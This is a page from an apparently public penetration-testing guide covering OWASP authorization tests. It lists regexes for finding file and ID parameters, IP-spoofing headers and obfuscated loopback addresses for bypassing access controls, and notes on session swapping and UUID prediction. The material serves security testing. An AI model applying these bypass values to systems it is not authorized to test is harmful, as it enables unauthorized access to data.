The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Authorization Testing
  • 4.5.1 Testing Directory Traversal File Include
  • 4.5.2 Testing for Bypassing Authorization Schema
  • 4.5.3 Testing for Privilege Escalation
  • 4.5.4 Testing for Insecure Direct Object References
  1. Web (OWASP Test cases)

4.5 Authorization Testing

Last updated 6 months ago

4.5.1

(?:\?|&)(\w+)=([^&]*\.(?:jpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|ppt|pptx|txt|zip|rar|mp3|mp4|wav|mov|avi|json|xml|csv|exe|bin|dll|tar|gz|html|css|js|php))\b

Evidence:

​

Headers:

X-Forwarded-For: 
X-Forwarded-IP: 
X-Client-IP: 
X-Remote-IP: 
X-Originating-IP: 
X-Host: 
X-Client: 
127.0.1
127.1
0.0.0.0
0
0x7f000001
2130706433
3232235521a
3232235777
017700000001
[::]
::
[0:0:0:0:0:ffff:127.0.0.1]
0:0:0:0:0:ffff:127.0.0.1
<COLLABORATOR>

Evidence:

​

Evidence:

​

Look for ID numbers:

(?:\?|&)(\w+)=\w*\d+\w*\b

Look for IDs:

(\w+)=[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}

Evidence:

​

4.5.2

For every request, change the session identifier from the original to another role’s session identifier and evaluate the responses for each. (Usage of )

For every request, change the relevant parameters and the session identifier from token one to token two and diagnose the responses for each token. (Usage of )

Values:

4.5.3

4.5.4

If UUID are used check its . Because version 1 is based on time stamps you can perform a .

Authorization Testing
Testing Directory Traversal File Include
Testing for Bypassing Authorization Schema
Autorize
Autorize
https://nip.io/
Testing for Privilege Escalation
Testing for Insecure Direct Object References
version
sandwich attack